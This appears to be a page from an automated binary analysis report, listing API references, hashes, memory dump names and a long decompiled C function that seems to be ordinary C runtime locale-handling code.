0x6e1c4b4a
0x6e1c4b53
0x6e1c4ad7
0x6e1c4ad7
0x6e1c4ada
0x6e1c4ade
0x6e1c4ae2
0x6e1c4aec
0x6e1c4aef
0x00000000
0x6e1c4aef
0x6e1c4ac0
0x6e1c4ac0
0x00000000
0x6e1c4ac0
0x6e1c4abe

APIs

__EH_prolog3.LIBCMT ref: 6E1C4A87
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C4A91
int.LIBCPMT ref: 6E1C4AA8

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C4AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C4AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C4B16

Strings

4k(n, xrefs: 6E1C4A9A

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4k(n
API String ID: 651022567-3990386398
Opcode ID: b94367a7a0ed1b6a27aa7eba5cd2aebd67f1f5b38f2d76c6a87209c11e8c0995
Instruction ID: 52377b831dd09ab936afd4acb59c211208609b4003ec56069c12ba55a5771372
Opcode Fuzzy Hash: b94367a7a0ed1b6a27aa7eba5cd2aebd67f1f5b38f2d76c6a87209c11e8c0995
Instruction Fuzzy Hash: F91125B59005298BCF01DBE4C844AFDB779BF24B14F140908E111EB2D0DF78C985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E20E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E20E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6E20F26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6e20da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6e230f34);
					_push( *0x6e230dec);
					E6E20E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6e230dec;
					while(1) {
						L2:
						_t246 = E6E21D470(_t430, 0x351, 0x6e230f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6e230f34);
							_push( *_t373);
							E6E20E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6e230e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E20CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6E20CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6E20CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6E20CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6E20CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6e28506c; // 0x9881d723
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6E20E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431);
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6E20DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6e20da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6E21D60D(_t447, 0x6e230f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6e230dec;
													_v460 = 1;
													do {
														_t268 = E6E20ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6e230e1c;
													} while (_t365 <= 0x6e230e1c);
													_t362 = _v472 + 2;
													_t269 = E6E21D5BD(_t379, _t362, 0x6e230f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6E21D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E202188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6e28506c; // 0x9881d723
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6E20D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6E20DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6E20F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6E2091A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6E202188();
																					asm("int3");
																					_t295 =  *0x6e2876f0; // 0x35b47d8
																					 *0x6e285108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6e2851c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6e2851ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6E20DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6E216102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6e230ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6E1E1C3C( &_v536,  *0x6e2851e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6e230de8; // 0x6e1c815c
																					 *0x6e22a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6e2852b0;
																						if(_t401 != 0x6e2852b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6E20CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6E20CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6E1DF8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6E1E03A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6E1DF8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}

0x6e20e506
0x6e20e509
0x6e20e50b
0x6e20e50e
0x6e20e50f
0x6e20e518
0x6e20e520
0x6e20e522
0x6e20e524
0x6e20e527
0x6e20e640
0x6e20e645
0x6e20e52d
0x6e20e52d
0x6e20e52e
0x6e20e52e
0x6e20e531
0x6e20e534
0x6e20e536
0x6e20e539
0x6e20e539
0x6e20e53c
0x6e20e53e
0x6e20e541
0x6e20e546
0x6e20e554
0x6e20e55e
0x6e20e561
0x6e20e564
0x6e20e564
0x6e20e56f
0x6e20e574
0x6e20e579
0x00000000
0x6e20e57f
0x6e20e582
0x6e20e582
0x6e20e585
0x6e20e587
0x6e20e58a
0x6e20e58a
0x6e20e58a
0x6e20e58c
0x6e20e58c
0x6e20e58c
0x6e20e592
0x00000000
0x00000000
0x6e20e597
0x6e20e5ae
0x6e20e5ae
0x6e20e599
0x6e20e599
0x6e20e5a1
0x00000000
0x6e20e5a3
0x6e20e5a3
0x6e20e5a6
0x6e20e5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e5ac
0x6e20e5a1
0x6e20e5b7
0x6e20e5bc
0x6e20e5be
0x6e20e5c3
0x6e20e5c6
0x6e20e5c9
0x6e20e5cc
0x6e20e5cf
0x6e20e5d1
0x6e20e5d6
0x6e20e5e0
0x6e20e5e8
0x6e20e5f0
0x00000000
0x6e20e5f6
0x6e20e5fa
0x6e20e647
0x6e20e64d
0x6e20e650
0x6e20e653
0x6e20e655
0x6e20e659
0x6e20e65d
0x6e20e65f
0x6e20e662
0x6e20e667
0x6e20e65d
0x6e20e668
0x6e20e66b
0x6e20e66d
0x6e20e66f
0x6e20e673
0x6e20e674
0x6e20e676
0x6e20e679
0x6e20e67e
0x6e20e674
0x6e20e681
0x6e20e684
0x6e20e687
0x6e20e68a
0x6e20e68d
0x6e20e68d
0x6e20e5fc
0x6e20e5fc
0x6e20e5ff
0x6e20e602
0x6e20e604
0x6e20e608
0x6e20e60c
0x6e20e60e
0x6e20e611
0x6e20e616
0x6e20e60c
0x6e20e617
0x6e20e61c
0x6e20e61e
0x6e20e623
0x6e20e625
0x6e20e628
0x6e20e62d
0x6e20e623
0x6e20e62e
0x6e20e632
0x6e20e632
0x6e20e635
0x6e20e639
0x6e20e63c
0x6e20e63c
0x00000000
0x6e20e63f
0x00000000
0x6e20e5f0
0x6e20e5b2
0x6e20e5b4
0x6e20e5b4
0x00000000
0x6e20e5b4
0x6e20e694
0x6e20e695
0x6e20e696
0x6e20e697
0x6e20e698
0x6e20e699
0x6e20e69e
0x6e20e6a1
0x6e20e6a2
0x6e20e6a4
0x6e20e6aa
0x6e20e6b1
0x6e20e6b4
0x6e20e6b7
0x6e20e6b8
0x6e20e6b9
0x6e20e6bc
0x6e20e6bd
0x6e20e6c0
0x6e20e6c6
0x6e20e6c8
0x6e20e6ed
0x6e20e6f7
0x6e20e6fd
0x6e20e6ff
0x6e20e705
0x6e20e707
0x6e20e95a
0x6e20e95b
0x00000000
0x6e20e70d
0x6e20e70d
0x6e20e711
0x6e20e878
0x6e20e88f
0x6e20e894
0x6e20e897
0x6e20e899
0x6e20e89f
0x6e20e89f
0x6e20e8a1
0x6e20e8a1
0x6e20e8a4
0x6e20e8a6
0x6e20e8ac
0x6e20e8ac
0x6e20e8ae
0x6e20e935
0x6e20e935
0x6e20e8b4
0x6e20e8b4
0x6e20e8b6
0x6e20e8bc
0x6e20e8bf
0x6e20e8c2
0x6e20e8c8
0x00000000
0x00000000
0x6e20e8ca
0x6e20e8ce
0x6e20e8f7
0x6e20e8f7
0x6e20e8f9
0x6e20e8d0
0x6e20e8d0
0x6e20e8d4
0x6e20e8d8
0x6e20e8df
0x6e20e8e5
0x00000000
0x6e20e8e7
0x6e20e8e7
0x6e20e8ea
0x6e20e8ed
0x6e20e8f5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e8f5
0x6e20e8e5
0x6e20e904
0x6e20e904
0x6e20e906
0x6e20e934
0x6e20e934
0x00000000
0x6e20e908
0x6e20e908
0x6e20e90e
0x6e20e90f
0x6e20e910
0x6e20e911
0x6e20e916
0x6e20e91c
0x6e20e91f
0x6e20e921
0x6e20e928
0x6e20e92a
0x6e20e92c
0x6e20e923
0x6e20e923
0x6e20e924
0x00000000
0x6e20e924
0x6e20e921
0x00000000
0x6e20e906
0x6e20e8fd
0x6e20e8ff
0x6e20e902
0x6e20e902
0x00000000
0x6e20e902
0x6e20e93b
0x6e20e93b
0x6e20e93c
0x6e20e93f
0x6e20e945
0x6e20e945
0x6e20e94e
0x6e20e950
0x00000000
0x6e20e952
0x6e20e952
0x00000000
0x6e20e952
0x6e20e950
0x00000000
0x6e20e717
0x6e20e717
0x6e20e71c
0x00000000
0x6e20e722
0x6e20e722
0x6e20e727
0x00000000
0x6e20e72d
0x6e20e72d
0x6e20e733
0x6e20e738
0x6e20e73a
0x6e20e741
0x6e20e742
0x6e20e744
0x00000000
0x00000000
0x6e20e74a
0x6e20e74a
0x6e20e74e
0x6e20e754
0x00000000
0x6e20e75a
0x6e20e75c
0x6e20e75d
0x6e20e760
0x00000000
0x6e20e766
0x6e20e766
0x6e20e76c
0x6e20e771
0x6e20e77b
0x6e20e77f
0x6e20e784
0x6e20e787
0x6e20e789
0x00000000
0x6e20e78b
0x6e20e78b
0x6e20e78d
0x6e20e790
0x6e20e790
0x6e20e793
0x6e20e796
0x6e20e796
0x6e20e7a1
0x6e20e7a3
0x6e20e7a5
0x00000000
0x00000000
0x6e20e7a5
0x00000000
0x6e20e7a7
0x6e20e7a7
0x6e20e7ad
0x6e20e7b0
0x6e20e7b0
0x6e20e7be
0x6e20e7c7
0x6e20e7cc
0x6e20e7d2
0x6e20e7d5
0x6e20e7d6
0x6e20e7d8
0x6e20e7e6
0x6e20e7e6
0x6e20e7ed
0x6e20e84e
0x00000000
0x6e20e7ef
0x6e20e7ef
0x6e20e7fd
0x6e20e802
0x6e20e805
0x6e20e807
0x6e20e977
0x6e20e979
0x6e20e97a
0x6e20e97b
0x6e20e97c
0x6e20e97d
0x6e20e97e
0x6e20e983
0x6e20e986
0x6e20e987
0x6e20e98f
0x6e20e996
0x6e20e999
0x6e20e99a
0x6e20e99d
0x6e20e9a1
0x6e20e9a2
0x6e20e9a5
0x6e20e9b5
0x6e20e9d8
0x6e20e9dd
0x6e20e9e0
0x6e20e9e2
0x6e20e9f7
0x6e20e9fa
0x6e20e9fa
0x6e20e9fd
0x6e20ea03
0x6e20ea09
0x6e20ea0c
0x6e20ea0e
0x6e20ea11
0x6e20ea18
0x6e20ea1b
0x6e20ea21
0x00000000
0x00000000
0x6e20ea23
0x6e20ea27
0x6e20ea50
0x6e20ea50
0x6e20ea29
0x6e20ea29
0x6e20ea2d
0x6e20ea31
0x6e20ea38
0x6e20ea3e
0x00000000
0x6e20ea40
0x6e20ea40
0x6e20ea43
0x6e20ea46
0x6e20ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20ea4e
0x6e20ea3e
0x6e20ea5d
0x6e20ea5d
0x6e20ea5f
0x6e20ea65
0x6e20ea6b
0x6e20ea6e
